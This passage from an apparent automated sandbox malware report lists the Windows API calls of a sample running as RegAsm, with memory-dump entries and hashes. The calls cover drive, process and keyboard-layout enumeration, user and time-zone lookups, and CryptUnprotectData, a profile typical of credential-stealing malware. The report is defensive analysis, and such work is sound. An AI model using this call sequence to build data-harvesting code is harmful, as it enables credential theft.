                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                        • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                        • Opcode ID: a85935071ed028ccb887984294324c805ba07e73e77383751ec2fc5b7b9a3d65
                                                                                                                                                                                                                                        • Instruction ID: eeb92eb2e088ba99ef655e86b2d393bd480e6a99e373443789db7790e17aa851
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a85935071ed028ccb887984294324c805ba07e73e77383751ec2fc5b7b9a3d65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5F1E272F043908FEB129F78E88971BB7E4BB54744F484929F88AD7291DB31D844CB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416C29
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00416C4E
                                                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00416C57
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00416C76
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00416C94
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00416CB7
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00416D21
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                        • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                        • Opcode ID: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
                                                                                                                                                                                                                                        • Instruction ID: fe13885b78f3290ecd7d39ef56567dba2d5f472473329e8ca487ae6efe04297a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74619071600244ABDB31EF61CC45FEE7769EF05704F60412EBA1967182DF7C6A88CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                        • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                        • Opcode ID: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
                                                                                                                                                                                                                                        • Instruction ID: 32467d17135c4381fdee801ccc49f121a9f7beaa17eb491a29c7cc63036ba799
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89319371900119EBCB10DFD5DC85BEEB7B9FB08704F50406EF209A3281DBB85A84CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410378
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00410387
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004103B2
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                        • String ID: wwww
                                                                                                                                                                                                                                        • API String ID: 362916592-671953474
                                                                                                                                                                                                                                        • Opcode ID: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
                                                                                                                                                                                                                                        • Instruction ID: 44720081d5bfcf4de0b039264fe6252f71ebe3c074e5847fe516a4db065da787
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4F02774B00214ABD72C6B689C1EFAE7B1E8B82211F444355FE06CB2C0EAB00C1486D5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
                                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410BE9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 562399079-0
                                                                                                                                                                                                                                        • Opcode ID: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
                                                                                                                                                                                                                                        • Instruction ID: 6e6253c0bc7aca0069297d9a5e7774d33834fdaa728087442e1970efbb29e10a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA21A271A00118EBCB10DFE5DC44BEEB7BCBB49B14F50416EF505A3281DBB85A498B64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C89
                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00411C99
                                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00411CAB
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,?), ref: 00411CC0
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00411CE2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                        • Opcode ID: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
                                                                                                                                                                                                                                        • Instruction ID: 08e3f1599d3a10f929bed3b41f19ba99720e1616bff5518888d5ac45308be21b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD11BF76A01518ABC721CF89DC44BDEFBB9FB86710F204296FA05D3250D7345A40CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 869800140-0
                                                                                                                                                                                                                                        • Opcode ID: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
                                                                                                                                                                                                                                        • Instruction ID: 21c28c5b9c274bc113086ca6f345efa6a7341173b31fdfb7d0b317eddc9c08d9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F111275200209ABDB10DFA5EC85EEB77EDEF4A351F10455AFD18D7340D7719C518AA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                        • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                        • Opcode ID: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
                                                                                                                                                                                                                                        • Instruction ID: 18608df84cbcd0239a302a1ab97b581227ab4f7f43221c1533691961591ac6d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53116031A00119EACB14DBD4D885BFDB7B9BF18304F1400AEF609B3182DBB85AC4CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406FEE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2068576380-0
                                                                                                                                                                                                                                        • Opcode ID: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
                                                                                                                                                                                                                                        • Instruction ID: 09355a3e94bf7739add38d711f9a133fcae8b2d8c69785aff26ce7a8339e2a5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B01E17960020AAFDB14DFA9DC55FAE77B9EF88B00F104559FA05AB380D675ED00CBA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
                                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                                                                                                        • Opcode ID: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
                                                                                                                                                                                                                                        • Instruction ID: 9804d81a03a056e57ee932ac7c1dbb4061c4f1b1a4941ccfe0fe277252d65891
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EED012B5541219BBD7109BD49C4DADB7BADDB0A751F501192FB05D3240D5F0590087E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
